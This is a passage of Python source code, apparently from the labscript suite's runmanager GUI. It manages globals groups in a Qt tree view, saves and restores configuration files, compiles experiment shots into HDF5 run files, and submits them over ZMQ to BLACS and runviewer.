elif not possible_name_items:
raise LookupError('No item found')
name_item = possible_name_items[0]
name_index = name_item.index()
# Found the name item, get the sibling item for the column requested:
item_index = name_index.sibling(name_index.row(), column)
item = self.groups_model.itemFromIndex(item_index)
return item
def do_model_sort(self):
header = self.ui.treeView_groups.header()
sort_column = header.sortIndicatorSection()
sort_order = header.sortIndicatorOrder()
self.ui.treeView_groups.sortByColumn(sort_column, sort_order)
@inmain_decorator() # Can be called from a non-main thread
def get_active_groups(self, interactive=True):
"""Returns active groups in the format {group_name: globals_file}.
Displays an error dialog and returns None if multiple groups of the
same name are selected, this is invalid - selected groups must be
uniquely named. If interactive=False, raises the exception instead."""
active_groups = {}
for i in range(self.groups_model.rowCount()):
file_name_item = self.groups_model.item(i, self.GROUPS_COL_NAME)
for j in range(file_name_item.rowCount()):
group_name_item = file_name_item.child(j, self.GROUPS_COL_NAME)
group_active_item = file_name_item.child(j, self.GROUPS_COL_ACTIVE)
if group_active_item.checkState() == QtCore.Qt.Checked:
group_name = group_name_item.text()
globals_file = file_name_item.text()
if group_name in active_groups:
msg = (
'There are two active groups named %s. ' % group_name
+ 'Active groups must have unique names.'
)
if interactive:
error_dialog(msg)
return
raise RuntimeError(msg)
active_groups[group_name] = globals_file
return active_groups
def open_globals_file(self, globals_file):
# Do nothing if this file is already open:
if self.groups_model.findItems(globals_file, column=self.GROUPS_COL_NAME):
return
# Get the groups:
groups = runmanager.get_grouplist(globals_file)
# Add the parent row:
file_name_item = QtGui.QStandardItem(globals_file)
file_name_item.setEditable(False)
file_name_item.setToolTip(globals_file)
# Sort column by name:
file_name_item.setData(globals_file, self.GROUPS_ROLE_SORT_DATA)
file_active_item = QtGui.QStandardItem()
file_active_item.setCheckState(QtCore.Qt.Unchecked)
# Sort column by CheckState - must keep this updated when checkstate changes:
file_active_item.setData(QtCore.Qt.Unchecked, self.GROUPS_ROLE_SORT_DATA)
file_active_item.setEditable(False)
file_active_item.setToolTip('Check to set all the file\'s groups as active.')
file_delete_item = QtGui.QStandardItem() # Blank, only groups have a delete button
file_delete_item.setEditable(False)
# Must be set to something so that the dummy row doesn't get sorted first:
file_delete_item.setData(False, self.GROUPS_ROLE_SORT_DATA)
file_close_item = QtGui.QStandardItem()
file_close_item.setIcon(QtGui.QIcon(':qtutils/fugue/cross'))
file_close_item.setEditable(False)
file_close_item.setToolTip('Close globals file.')
self.groups_model.appendRow([file_name_item, file_active_item, file_delete_item, file_close_item])
# Add the groups as children:
for group_name in groups:
row = self.make_group_row(group_name)
file_name_item.appendRow(row)
# Finally, add the <Click to add group> row at the bottom:
dummy_name_item = QtGui.QStandardItem(self.GROUPS_DUMMY_ROW_TEXT)
dummy_name_item.setToolTip('Click to add group')
# This lets later code know that this row does
# not correspond to an actual globals group:
dummy_name_item.setData(True, self.GROUPS_ROLE_IS_DUMMY_ROW)
dummy_name_item.setData(self.GROUPS_DUMMY_ROW_TEXT, self.GROUPS_ROLE_PREVIOUS_NAME)
dummy_name_item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsEditable) # Clears the 'selectable' flag
dummy_active_item = QtGui.QStandardItem()
dummy_active_item.setData(True, self.GROUPS_ROLE_IS_DUMMY_ROW)
dummy_active_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_delete_item = QtGui.QStandardItem()
dummy_delete_item.setData(True, self.GROUPS_ROLE_IS_DUMMY_ROW)
dummy_delete_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_open_close_item = QtGui.QStandardItem()
dummy_open_close_item.setData(True, self.GROUPS_ROLE_IS_DUMMY_ROW)
dummy_open_close_item.setFlags(QtCore.Qt.NoItemFlags)
# Not setting anything as the above items' sort role has the effect of
# ensuring this row is always sorted to the end of the list, without
# us having to implement any custom sorting methods or subclassing
# anything, yay.
file_name_item.appendRow([dummy_name_item, dummy_active_item, dummy_delete_item, dummy_open_close_item])
# Expand the child items to be visible:
self.ui.treeView_groups.setExpanded(file_name_item.index(), True)
self.globals_changed()
self.do_model_sort()
# If this changed the sort order, ensure the file item is visible:
scroll_view_to_row_if_current(self.ui.treeView_groups, file_name_item)
def make_group_row(self, group_name):
"""Returns a new row representing one group in the groups tab, ready to be
inserted into the model."""
group_name_item = QtGui.QStandardItem(group_name)
# We keep the previous name around so that we can detect what changed:
group_name_item.setData(group_name, self.GROUPS_ROLE_PREVIOUS_NAME)
# Sort column by name:
group_name_item.setData(group_name, self.GROUPS_ROLE_SORT_DATA)
group_active_item = QtGui.QStandardItem()
group_active_item.setCheckState(QtCore.Qt.Unchecked)
# Sort column by CheckState - must keep this updated whenever the
# checkstate changes:
group_active_item.setData(QtCore.Qt.Unchecked, self.GROUPS_ROLE_SORT_DATA)
group_active_item.setEditable(False)
group_active_item.setToolTip(
'Whether or not the globals within this group should be used by runmanager for compilation.')
group_delete_item = QtGui.QStandardItem()
group_delete_item.setIcon(QtGui.QIcon(':qtutils/fugue/minus'))
# Must be set to something so that the dummy row doesn't get sorted first:
group_delete_item.setData(False, self.GROUPS_ROLE_SORT_DATA)
group_delete_item.setEditable(False)
group_delete_item.setToolTip('Delete globals group from file.')
group_open_close_item = QtGui.QStandardItem()
group_open_close_item.setIcon(QtGui.QIcon(':qtutils/fugue/plus'))
group_open_close_item.setData(False, self.GROUPS_ROLE_GROUP_IS_OPEN)
# Sort column by whether group is open - must keep this manually
# updated when the state changes:
group_open_close_item.setData(False, self.GROUPS_ROLE_SORT_DATA)
group_open_close_item.setEditable(False)
group_open_close_item.setToolTip('Load globals group into runmananger.')
row = [group_name_item, group_active_item, group_delete_item, group_open_close_item]
return row
def close_globals_file(self, globals_file, confirm=True):
item = self.groups_model.findItems(globals_file, column=self.GROUPS_COL_NAME)[0]
# Close any open groups in this globals file:
child_name_items = [item.child(i, self.GROUPS_COL_NAME) for i in range(item.rowCount())]
child_openclose_items = [item.child(i, self.GROUPS_COL_OPENCLOSE) for i in range(item.rowCount())]
child_is_open = [child_item.data(self.GROUPS_ROLE_GROUP_IS_OPEN)
for child_item in child_openclose_items]
if confirm and any(child_is_open):
if not question_dialog('Close %s? This will close %d currently open group(s).' %
(globals_file, child_is_open.count(True))):
return
to_close = [name_item for name_item, is_open in zip(child_name_items, child_is_open) if is_open]
for name_item in to_close:
group_name = name_item.text()
self.close_group(globals_file, group_name)
# Remove the globals file from the model:
self.groups_model.removeRow(item.row())
self.globals_changed()
def copy_group(self, source_globals_file, source_group_name, dest_globals_file=None, delete_source_group=False):
"""This function copys a group of globals with the name source_group_name from the file
source_globals_file to a new file dest_globals_file. If delete_source_group is True
the source group is deleted after copying"""
if delete_source_group and source_globals_file == dest_globals_file:
return
try:
dest_group_name = runmanager.copy_group(source_globals_file, source_group_name, dest_globals_file, delete_source_group)
except Exception as e:
error_dialog(str(e))
else:
# Insert the newly created globals group into the model, as a
# child row of the new globals file.
if dest_globals_file is None:
dest_globals_file = source_globals_file
# find the new groups parent row by filepath
for index in range(self.groups_model.rowCount()):
if self.groups_model.item(index, self.GROUPS_COL_NAME).text() == dest_globals_file:
parent_row = self.groups_model.item(index)
break
last_index = parent_row.rowCount()
# Insert it as the row before the last (dummy) row:
group_row = self.make_group_row(dest_group_name)
parent_row.insertRow(last_index - 1, group_row)
self.do_model_sort()
# Open the group
self.open_group(dest_globals_file, dest_group_name)
name_item = group_row[self.GROUPS_COL_NAME]
self.globals_changed()
self.ui.treeView_groups.setCurrentIndex(name_item.index())
# delete original
if delete_source_group:
self.delete_group(source_globals_file, source_group_name, confirm=False)
# If this changed the sort order, ensure the group item is still visible:
scroll_view_to_row_if_current(self.ui.treeView_groups, name_item)
def new_group(self, globals_file, group_name):
item = self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_NAME,
previous_name=self.GROUPS_DUMMY_ROW_TEXT)
try:
runmanager.new_group(globals_file, group_name)
except Exception as e:
error_dialog(str(e))
else:
# Insert the newly created globals group into the model, as a
# child row of the globals file it belong to.
group_row = self.make_group_row(group_name)
last_index = item.parent().rowCount()
# Insert it as the row before the last (dummy) row:
item.parent().insertRow(last_index - 1, group_row)
self.do_model_sort()
# Open the group and mark it active:
self.open_group(globals_file, group_name)
active_item = group_row[self.GROUPS_COL_ACTIVE]
name_item = group_row[self.GROUPS_COL_NAME]
active_item.setCheckState(QtCore.Qt.Checked)
self.globals_changed()
self.ui.treeView_groups.setCurrentIndex(name_item.index())
# If this changed the sort order, ensure the group item is still visible:
scroll_view_to_row_if_current(self.ui.treeView_groups, name_item)
finally:
# Set the dummy row's text back ready for another group to be created:
item.setText(self.GROUPS_DUMMY_ROW_TEXT)
def open_group(self, globals_file, group_name, trigger_preparse=True):
assert (globals_file, group_name) not in self.currently_open_groups # sanity check
group_tab = GroupTab(self.ui.tabWidget, globals_file, group_name)
self.currently_open_groups[globals_file, group_name] = group_tab
# Set the open/close state in the groups_model. itemChanged will be
# emitted and self.on_groups_model_item_changed will handle updating
# the other data roles, icons etc:
openclose_item = self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_OPENCLOSE)
openclose_item.setData(True, self.GROUPS_ROLE_GROUP_IS_OPEN)
# Trigger a preparse to occur in light of this. Calling code can
# disable this so that multiple groups can be opened at once without
# triggering a preparse. If they do so, they should call
# self.globals_changed() themselves.
if trigger_preparse:
self.globals_changed()
def rename_group(self, globals_file, previous_group_name, new_group_name):
item = self.get_group_item_by_name(globals_file, new_group_name, self.GROUPS_COL_NAME,
previous_name=previous_group_name)
try:
runmanager.rename_group(globals_file, previous_group_name, new_group_name)
except Exception as e:
error_dialog(str(e))
# Set the item text back to the old name, since the rename failed:
item.setText(previous_group_name)
else:
item.setData(new_group_name, self.GROUPS_ROLE_PREVIOUS_NAME)
item.setData(new_group_name, self.GROUPS_ROLE_SORT_DATA)
self.do_model_sort()
# If this changed the sort order, ensure the group item is still visible:
scroll_view_to_row_if_current(self.ui.treeView_groups, item)
group_tab = self.currently_open_groups.pop((globals_file, previous_group_name), None)
if group_tab is not None:
# Change labels and tooltips appropriately if the group is open:
group_tab.set_file_and_group_name(globals_file, new_group_name)
# Re-add it to the dictionary under the new name:
self.currently_open_groups[globals_file, new_group_name] = group_tab
def close_group(self, globals_file, group_name):
group_tab = self.currently_open_groups.pop((globals_file, group_name), None)
assert group_tab is not None # Just in case
group_tab.close()
openclose_item = self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_OPENCLOSE)
openclose_item.setData(False, self.GROUPS_ROLE_GROUP_IS_OPEN)
def delete_group(self, globals_file, group_name, confirm=True):
if confirm:
if not question_dialog("Delete the group '%s'?" % group_name):
return
# If the group is open, close it:
group_tab = self.currently_open_groups.get((globals_file, group_name))
if group_tab is not None:
self.close_group(globals_file, group_name)
runmanager.delete_group(globals_file, group_name)
# Find the entry for this group in self.groups_model and remove it:
name_item = self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_NAME)
name_item.parent().removeRow(name_item.row())
self.globals_changed()
def on_save_configuration_triggered(self):
if self.last_save_config_file is None:
self.on_save_configuration_as_triggered()
self.ui.actionSave_configuration_as.setEnabled(True)
self.ui.actionRevert_configuration.setEnabled(True)
else:
self.save_configuration(self.last_save_config_file)
def on_revert_configuration_triggered(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = 'Revert configuration to the last saved state in \'%s\'?' % self.last_save_config_file
reply = QtWidgets.QMessageBox.question(self.ui, 'Load configuration', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return
elif reply == QtWidgets.QMessageBox.Yes:
self.load_configuration(self.last_save_config_file)
else:
error_dialog('no changes to revert')
def on_save_configuration_as_triggered(self):
if self.last_save_config_file is not None:
default = self.last_save_config_file
else:
default = os.path.join(self.exp_config.get('paths', 'experiment_shot_storage'), 'runmanager.ini')
save_file = QtWidgets.QFileDialog.getSaveFileName(self.ui,
'Select file to save current runmanager configuration',
default,
"config files (*.ini)")
if type(save_file) is tuple:
save_file, _ = save_file
if not save_file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
save_file = os.path.abspath(save_file)
self.save_configuration(save_file)
def get_save_data(self):
# Get the currently open files and active groups:
h5_files_open = []
active_groups = []
for i in range(self.groups_model.rowCount()):
file_name_item = self.groups_model.item(i, self.GROUPS_COL_NAME)
globals_file_name = file_name_item.text()
h5_files_open.append(globals_file_name)
for j in range(file_name_item.rowCount()):
group_name_item = file_name_item.child(j, self.GROUPS_COL_NAME)
group_name = group_name_item.text()
group_active_item = file_name_item.child(j, self.GROUPS_COL_ACTIVE)
if group_active_item.checkState() == QtCore.Qt.Checked:
active_groups.append((globals_file_name, group_name))
# Get the currently open groups:
groups_open = []
for i in range(self.ui.tabWidget.count()):
tab_page = self.ui.tabWidget.widget(i)
for (globals_file_name, group_name), group_tab in self.currently_open_groups.items():
if group_tab.ui is tab_page:
groups_open.append((globals_file_name, group_name))
break
# Get the labscript file, output folder, and whether the output folder
# is default:
current_labscript_file = self.ui.lineEdit_labscript_file.text()
shot_output_folder = self.ui.lineEdit_shot_output_folder.text()
is_using_default_shot_output_folder = (shot_output_folder == self.get_default_output_folder())
# Only save the shot output folder if not using the default, that way
# the folder updating as the day rolls over will not be detected as a
# change to the save data:
if is_using_default_shot_output_folder:
shot_output_folder = ''
# Get the server hostnames:
BLACS_host = self.ui.lineEdit_BLACS_hostname.text()
send_to_runviewer = self.ui.checkBox_view_shots.isChecked()
send_to_BLACS = self.ui.checkBox_run_shots.isChecked()
shuffle = self.ui.pushButton_shuffle.isChecked()
# axes tab information
axes = []
for i in range(self.axes_model.rowCount()):
name_item = self.axes_model.item(i, self.AXES_COL_NAME)
shuffle_item = self.axes_model.item(i, self.AXES_COL_SHUFFLE)
shuffle_state = shuffle_item.checkState()
axes.append((name_item.data(self.AXES_ROLE_NAME), 1 if shuffle_state == QtCore.Qt.Checked else 0))
save_data = {'h5_files_open': h5_files_open,
'active_groups': active_groups,
'groups_open': groups_open,
'current_labscript_file': current_labscript_file,
'shot_output_folder': shot_output_folder,
'is_using_default_shot_output_folder': is_using_default_shot_output_folder,
'send_to_runviewer': send_to_runviewer,
'send_to_BLACS': send_to_BLACS,
'shuffle': shuffle,
'axes': axes,
'BLACS_host': BLACS_host}
return save_data
def save_configuration(self, save_file):
runmanager_config = LabConfig(save_file)
save_data = self.get_save_data()
self.last_save_config_file = save_file
self.last_save_data = save_data
for key, value in save_data.items():
runmanager_config.set('runmanager_state', key, pprint.pformat(value))
def on_load_configuration_triggered(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = ('Current configuration (which groups are active/open and other GUI state) '
'has changed: save config file \'%s\'?' % self.last_save_config_file)
reply = QtWidgets.QMessageBox.question(self.ui, 'Load configuration', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return
if reply == QtWidgets.QMessageBox.Yes:
self.save_configuration(self.last_save_config_file)
if self.last_save_config_file is not None:
default = self.last_save_config_file
else:
default = os.path.join(self.exp_config.get('paths', 'experiment_shot_storage'), 'runmanager.ini')
file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select runmanager configuration file to load',
default,
"config files (*.ini)")
if type(file) is tuple:
file, _ = file
if not file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
file = os.path.abspath(file)
self.load_configuration(file)
def load_configuration(self, filename):
self.last_save_config_file = filename
self.ui.actionSave_configuration.setText('Save configuration %s'%filename)
# Close all files:
save_data = self.get_save_data()
for globals_file in save_data['h5_files_open']:
self.close_globals_file(globals_file, confirm=False)
# Ensure folder exists, if this was opened programmatically we are
# creating the file, so the directory had better exist!
runmanager_config = LabConfig(filename)
has_been_a_warning = [False]
def warning(message):
if not has_been_a_warning[0]:
has_been_a_warning[0] = True
self.output_box.output('\n')
self.output_box.output('Warning: %s\n' % message, red=True)
try:
h5_files_open = ast.literal_eval(runmanager_config.get('runmanager_state', 'h5_files_open'))
except Exception:
pass
else:
for globals_file in h5_files_open:
if os.path.exists(globals_file):
try:
self.open_globals_file(globals_file)
self.last_opened_globals_folder = os.path.dirname(globals_file)
except Exception:
raise_exception_in_thread(sys.exc_info())
continue
else:
self.output_box.output('\nWarning: globals file %s no longer exists\n' % globals_file, red=True)
try:
active_groups = ast.literal_eval(runmanager_config.get('runmanager_state', 'active_groups'))
except Exception:
pass
else:
for globals_file, group_name in active_groups:
try:
group_active_item = self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_ACTIVE)
group_active_item.setCheckState(QtCore.Qt.Checked)
except LookupError:
warning("previously active group '%s' in %s no longer exists" % (group_name, globals_file))
try:
groups_open = ast.literal_eval(runmanager_config.get('runmanager_state', 'groups_open'))
except Exception:
pass
else:
for globals_file, group_name in groups_open:
# First check if it exists:
try:
self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_NAME)
except LookupError:
warning("previously open group '%s' in %s no longer exists" % (group_name, globals_file))
else:
self.open_group(globals_file, group_name)
try:
current_labscript_file = ast.literal_eval(
runmanager_config.get('runmanager_state', 'current_labscript_file'))
except Exception:
pass
else:
if os.path.exists(current_labscript_file):
self.ui.lineEdit_labscript_file.setText(current_labscript_file)
self.last_opened_labscript_folder = os.path.dirname(current_labscript_file)
elif current_labscript_file:
warning('previously selected labscript file %s no longer exists' % current_labscript_file)
try:
shot_output_folder = ast.literal_eval(runmanager_config.get('runmanager_state', 'shot_output_folder'))
except Exception:
pass
else:
self.ui.lineEdit_shot_output_folder.setText(shot_output_folder)
self.last_selected_shot_output_folder = os.path.dirname(shot_output_folder)
try:
is_using_default_shot_output_folder = ast.literal_eval(
runmanager_config.get('runmanager_state', 'is_using_default_shot_output_folder'))
except Exception:
pass
else:
if is_using_default_shot_output_folder:
default_output_folder = self.get_default_output_folder()
self.ui.lineEdit_shot_output_folder.setText(default_output_folder)
self.last_selected_shot_output_folder = os.path.dirname(default_output_folder)
try:
send_to_runviewer = ast.literal_eval(runmanager_config.get('runmanager_state', 'send_to_runviewer'))
except Exception:
pass
else:
self.ui.checkBox_view_shots.setChecked(send_to_runviewer)
try:
send_to_BLACS = ast.literal_eval(runmanager_config.get('runmanager_state', 'send_to_BLACS'))
except Exception:
pass
else:
self.ui.checkBox_run_shots.setChecked(send_to_BLACS)
# clear the axes model first
if self.axes_model.rowCount():
self.axes_model.removeRows(0, self.axes_model.rowCount())
# set the state of the global shuffle button. This ensure that if no axes items get loaded afterwards
# (e.g. because the globals in the .ini file are no longer expansion globals), then we still have
# an approximate state for the shuffle button that will apply to whatever globals are to be expanded.
try:
shuffle = ast.literal_eval(runmanager_config.get('runmanager_state', 'shuffle'))
except Exception:
pass
else:
if shuffle:
self.ui.pushButton_shuffle.setChecked(True)
# Now load the axes states (order and shuffle). This will also ensure the shuffle button matches the
# state of these items (since we don't save/restore the tri-state nature of the global shuffle button
try:
axes = ast.literal_eval(runmanager_config.get('runmanager_state', 'axes'))
except Exception:
pass
else:
if isinstance(axes, list):
# clear model
for name, shuffle in axes:
self.add_item_to_axes_model(name, shuffle)
self.update_axes_indentation()
try:
BLACS_host = ast.literal_eval(runmanager_config.get('runmanager_state', 'BLACS_host'))
except Exception:
pass
else:
self.ui.lineEdit_BLACS_hostname.setText(BLACS_host)
# Set as self.last_save_data:
save_data = self.get_save_data()
self.last_save_data = save_data
self.ui.actionSave_configuration_as.setEnabled(True)
self.ui.actionRevert_configuration.setEnabled(True)
def compile_loop(self):
while True:
try:
labscript_file, run_files, send_to_BLACS, BLACS_host, send_to_runviewer = self.compile_queue.get()
run_files = iter(run_files) # Should already be in iterator but just in case
while True:
if self.compilation_aborted.is_set():
self.output_box.output('Compilation aborted.\n\n', red=True)
break
try:
try:
# We do next() instead of looping over run_files
# so that if compilation is aborted we won't
# create an extra file unnecessarily.
run_file = next(run_files)
except StopIteration:
self.output_box.output('Ready.\n\n')
break
else:
self.to_child.put(['compile', [labscript_file, run_file]])
signal, success = self.from_child.get()
assert signal == 'done'
if not success:
self.compilation_aborted.set()
continue
if send_to_BLACS:
self.send_to_BLACS(run_file, BLACS_host)
if send_to_runviewer:
self.send_to_runviewer(run_file)
except Exception as e:
self.output_box.output(str(e) + '\n', red=True)
self.compilation_aborted.set()
inmain(self.ui.pushButton_abort.setEnabled, False)
self.compilation_aborted.clear()
except Exception:
# Raise it so whatever bug it is gets seen, but keep going so
# the thread keeps functioning:
exc_info = sys.exc_info()
raise_exception_in_thread(exc_info)
continue
def parse_globals(self, active_groups, raise_exceptions=True, expand_globals=True, expansion_order = None, return_dimensions = False):
sequence_globals = runmanager.get_globals(active_groups)
#logger.info('got sequence globals')
evaled_globals, global_hierarchy, expansions = runmanager.evaluate_globals(sequence_globals, raise_exceptions)
#logger.info('evaluated sequence globals')
if expand_globals:
if return_dimensions:
shots, dimensions = runmanager.expand_globals(sequence_globals, evaled_globals, expansion_order, return_dimensions=return_dimensions)
else:
shots = runmanager.expand_globals(sequence_globals, evaled_globals, expansion_order)
else:
shots = []
dimensions = {}
#logger.info('expanded sequence globals')
if return_dimensions:
return sequence_globals, shots, evaled_globals, global_hierarchy, expansions, dimensions
else:
return sequence_globals, shots, evaled_globals, global_hierarchy, expansions
def guess_expansion_modes(self, active_groups, evaled_globals, global_hierarchy, expansions):
"""This function is designed to be called iteratively. It changes the
expansion type of globals that reference other globals - such that
globals referencing an iterable global will be zipped with it, rather
than outer producted. Each time this method is called,
self.parse_globals should also be called, so that the globals are
evaluated with their new expansion modes, if they changed. This should
be performed repeatedly until there are no more changes. Note that
this method does not return what expansion types it thinks globals
should have - it *actually writes them to the globals HDF5 file*. So
it is up to later code to ensure it re-reads the expansion mode from
the HDF5 file before proceeding. At present this method is only called
from self.preparse_globals(), so see there to see how it fits in with
everything else. This method uses four instance attributes to store
state: self.previous_evaled_globals, self.previous_global_hierarchy,
self.previous_expansion_types and self.previous_expansions. This is
neccesary so that it can detect changes."""
# Do nothing if there were exceptions:
for group_name in evaled_globals:
for global_name in evaled_globals[group_name]:
value = evaled_globals[group_name][global_name]
if isinstance(value, Exception):
# Let ExpansionErrors through through, as they occur
# when the user has changed the value without changing
# the expansion type:
if isinstance(value, runmanager.ExpansionError):
continue
return False
# Did the guessed expansion type for any of the globals change?
expansion_types_changed = False
expansion_types = {}
for group_name in evaled_globals:
for global_name in evaled_globals[group_name]:
new_value = evaled_globals[group_name][global_name]
try:
previous_value = self.previous_evaled_globals[group_name][global_name]
except KeyError:
# This variable is used to guess the expansion type
#
# If we already have an expansion specified for this, but
# don't have a previous value, then we should use the
# new_value for the guess as we are likely loading from HDF5
# file for the first time (and either way, don't want to
# overwrite what the user has put in the expansion type)
#
# If we don't have an expansion...
# then we set it to '0' which will result in an
# expansion type guess of '' (emptys string) This will
# either result in nothing being done to the expansion
# type or the expansion type being found to be 'outer',
# which will then make it go through the machinery below
if global_name in expansions and expansions[global_name]:
previous_value = new_value
else:
previous_value = 0
new_guess = runmanager.guess_expansion_type(new_value)
previous_guess = runmanager.guess_expansion_type(previous_value)
if new_guess == 'outer':
expansion_types[global_name] = {'previous_guess': previous_guess,
'new_guess': new_guess,
'group_name': group_name,
'value': new_value
}
elif new_guess != previous_guess:
filename = active_groups[group_name]
runmanager.set_expansion(filename, group_name, global_name, new_guess)
expansions[global_name] = new_guess
expansion_types_changed = True
# recursively find dependencies and add them to a zip group!
def find_dependencies(global_name, global_hierarchy, expansion_types):
results = set()
for name, dependencies in global_hierarchy.items():
if name in expansion_types and global_name in dependencies:
results.add(name)
results = results.union(find_dependencies(name, global_hierarchy, expansion_types))
return results
def global_depends_on_global_with_outer_product(global_name, global_hierarchy, expansions):
if global_name not in global_hierarchy:
return False
else:
for dependency in global_hierarchy[global_name]:
if expansions[dependency]:
return True
def set_expansion_type_guess(expansion_types, expansions, global_name, expansion_to_set, new=True):
if new:
key = 'new_guess'
else:
key = 'previous_guess'
# debug logging
log_if_global(global_name, [], 'setting expansion type for new dependency' if new else 'setting expansion type for old dependencies')
# only do this if the expansion is *not* already set to a specific zip group
if global_name in expansions and expansions[global_name] != '' and expansions[global_name] != 'outer':
expansion_types[global_name][key] = expansions[global_name]
# debug logging
log_if_global(global_name, [], 'Using existing expansion %s for %s'%(expansions[global_name], global_name))
else:
expansion_types[global_name][key] = expansion_to_set
expansions[global_name] = expansion_to_set
# debug logging
log_if_global(global_name, [], 'Using existing expansion %s for %s'%(expansion_to_set, global_name))
for global_name in sorted(expansion_types):
# we have a global that does not depend on anything that has an
# expansion type of 'outer'
if (not global_depends_on_global_with_outer_product(global_name, global_hierarchy, expansions)
and not isinstance(expansion_types[global_name]['value'], runmanager.ExpansionError)):
current_dependencies = find_dependencies(global_name, global_hierarchy, expansion_types)
# if this global has other globals that use it, then add them
# all to a zip group with the name of this global
if current_dependencies:
for dependency in current_dependencies:
set_expansion_type_guess(expansion_types, expansions, dependency, str(global_name))
set_expansion_type_guess(expansion_types, expansions, global_name, str(global_name))
for global_name in sorted(self.previous_expansion_types):
if (not global_depends_on_global_with_outer_product(
global_name, self.previous_global_hierarchy, self.previous_expansions)
and not isinstance(self.previous_expansion_types[global_name]['value'], runmanager.ExpansionError)):
old_dependencies = find_dependencies(global_name, self.previous_global_hierarchy, self.previous_expansion_types)
# if this global has other globals that use it, then add them
# all to a zip group with the name of this global
if old_dependencies:
for dependency in old_dependencies:
if dependency in expansion_types:
set_expansion_type_guess(expansion_types, self.previous_expansions, dependency, str(global_name), new=False)
if global_name in expansion_types:
set_expansion_type_guess(expansion_types, self.previous_expansions, global_name, str(global_name), new=False)
for global_name, guesses in expansion_types.items():
if guesses['new_guess'] != guesses['previous_guess']:
filename = active_groups[guesses['group_name']]
runmanager.set_expansion(
filename, str(guesses['group_name']), str(global_name), str(guesses['new_guess']))
expansions[global_name] = guesses['new_guess']
expansion_types_changed = True
# Now check everything that has an expansion type not equal to outer.
# If it has one, but is not iteratble, remove it from teh zip group
for group_name in evaled_globals:
for global_name in evaled_globals[group_name]:
if expansions[global_name] and expansions[global_name] != 'outer':
try:
iter(evaled_globals[group_name][global_name])
except Exception:
filename = active_groups[group_name]
runmanager.set_expansion(filename, group_name, global_name, '')
expansion_types_changed = True
self.previous_evaled_globals = evaled_globals
self.previous_global_hierarchy = global_hierarchy
self.previous_expansion_types = expansion_types
self.previous_expansions = expansions
return expansion_types_changed
def make_h5_files(self, labscript_file, output_folder, sequence_globals, shots, shuffle):
sequence_attrs, default_output_dir, filename_prefix = runmanager.new_sequence_details(
labscript_file, config=self.exp_config, increment_sequence_index=True
)
if output_folder == self.previous_default_output_folder:
# The user is using dthe efault output folder. Just in case the sequence
# index has been updated or the date has changed, use the default_output dir
# obtained from new_sequence_details, as it is race-free, whereas the one
# from the UI may be out of date since we only update it once a second.
output_folder = default_output_dir
self.check_output_folder_update()
run_files = runmanager.make_run_files(
output_folder,
sequence_globals,
shots,
sequence_attrs,
filename_prefix,
shuffle,
)
logger.debug(run_files)
return labscript_file, run_files
def send_to_BLACS(self, run_file, BLACS_hostname):
port = int(self.exp_config.get('ports', 'BLACS'))
agnostic_path = shared_drive.path_to_agnostic(run_file)
self.output_box.output('Submitting run file %s.\n' % os.path.basename(run_file))
try:
response = zmq_get(port, BLACS_hostname, data=agnostic_path)
if 'added successfully' in response:
self.output_box.output(response)
else:
raise Exception(response)
except Exception as e:
self.output_box.output('Couldn\'t submit job to control server: %s\n' % str(e), red=True)
self.compilation_aborted.set()
def send_to_runviewer(self, run_file):
runviewer_port = int(self.exp_config.get('ports', 'runviewer'))
agnostic_path = shared_drive.path_to_agnostic(run_file)
try:
response = zmq_get(runviewer_port, 'localhost', data='hello', timeout=1)
if 'hello' not in response:
raise Exception(response)
except Exception as e:
logger.info('runviewer not running, attempting to start...')
# Runviewer not running, start it:
if os.name == 'nt':
creationflags = 0x00000008 # DETACHED_PROCESS from the win32 API
subprocess.Popen([sys.executable, '-m', 'runviewer'],
creationflags=creationflags, stdout=None, stderr=None,
close_fds=True)
else:
devnull = open(os.devnull, 'w')
if not os.fork():
os.setsid()
subprocess.Popen([sys.executable, '-m', 'runviewer'],
stdin=devnull, stdout=devnull, stderr=devnull, close_fds=True)
os._exit(0)
try:
zmq_get(runviewer_port, 'localhost', data='hello', timeout=15)
except Exception as e:
self.output_box.output('Couldn\'t submit shot to runviewer: %s\n\n' % str(e), red=True)
try:
response = zmq_get(runviewer_port, 'localhost', data=agnostic_path, timeout=0.5)
if 'ok' not in response:
raise Exception(response)
else:
self.output_box.output('Shot %s sent to runviewer.\n' % os.path.basename(run_file))
except Exception as e:
self.output_box.output('Couldn\'t submit shot to runviewer: %s\n\n' % str(e), red=True)
class RemoteServer(ZMQServer):
def __init__(self):
port = app.exp_config.getint(
'ports', 'runmanager', fallback=runmanager.remote.DEFAULT_PORT
)
ZMQServer.__init__(self, port=port)
def handle_get_globals(self, raw=False):
active_groups = inmain(app.get_active_groups, interactive=False)
sequence_globals = runmanager.get_globals(active_groups)
all_globals = {}
if raw:
for group_globals in sequence_globals.values():
values_only = {name: val for name, (val, _, _) in group_globals.items()}
all_globals.update(values_only)
else:
evaled_globals, global_hierarchy, expansions = runmanager.evaluate_globals(
sequence_globals, raise_exceptions=False
)
for group_globals in evaled_globals.values():
all_globals.update(group_globals)
return all_globals
@inmain_decorator()
def handle_set_globals(self, globals, raw=False):
active_groups = app.get_active_groups(interactive=False)
sequence_globals = runmanager.get_globals(active_groups)
try:
for global_name, new_value in globals.items():
# Unless raw=True, convert to str representation for saving to the GUI
# or file. If this does not result in an object the user can actually
# use, evaluation will error and the caller will find out about it later
if not raw:
new_value = repr(new_value)
